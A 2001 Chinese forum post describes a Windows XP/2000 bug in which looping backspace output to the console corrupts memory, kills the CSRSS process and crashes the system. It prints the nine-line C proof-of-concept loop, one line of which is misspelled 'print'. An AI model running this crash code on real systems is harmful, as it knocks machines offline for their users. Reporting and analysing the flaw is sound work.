9行小程序可以使Windows XP/2000系统完全崩溃

bm_guest (JERICHO)
Microsoft Windows 标准输出系统崩溃漏洞与原来那个按F7的漏洞性质差不多。
这个漏洞主要是边界问题没考虑周全,\b是回退,就是显示返回上一个字符位置,可
能编写人员没有考虑到这边界问题,导致了基本输入输出访问内存越界出现非法访问,
从而导致WINDOWS的重要进程CSRSS被杀死,WINDOWS系统也整个崩溃。那个F7漏洞也
是产生了内存越界访问,出现非法操作,系统杀死csrss进程,然后就崩溃。
那测试程序的\t是不必要的。
微软一直声称Windows XP多么多么稳定可靠,但日前一位名为Masaru Tsuchiyama的外国
编程爱好者刊出了一小段C语言代码。这一只有9行的小程序如果在Windows XP/2000下运
行,则可导致系统完全崩溃,并重新启动。但此程序对其他版本的Windows没有任何影响

这一产生无限循环输出的小程序的代码如下:
  #include <stdio.h>
  int main( void )
  { 
  for(;;){
       printf( "hung up\t\t\b\b\b\b\b\b" );
       print("hung up\t\t\b\b\b\b\b\b");
      }
  return 0;
  }
  如果去掉Print语句,此程序还会导致NT 4.0系统出现蓝屏错误。
  但愿微软赶快修补这一漏洞。
(#251778@0)
2001-11-7 -05:00

回到话题: 9行小程序可以使Windows XP/2000系统完全崩溃

回到论坛: HOME枫下论坛枫下论坛主坛工作学习IT技术讨论

URL:   
http://www.rolia.net/zh/post.php?f=0&p=251778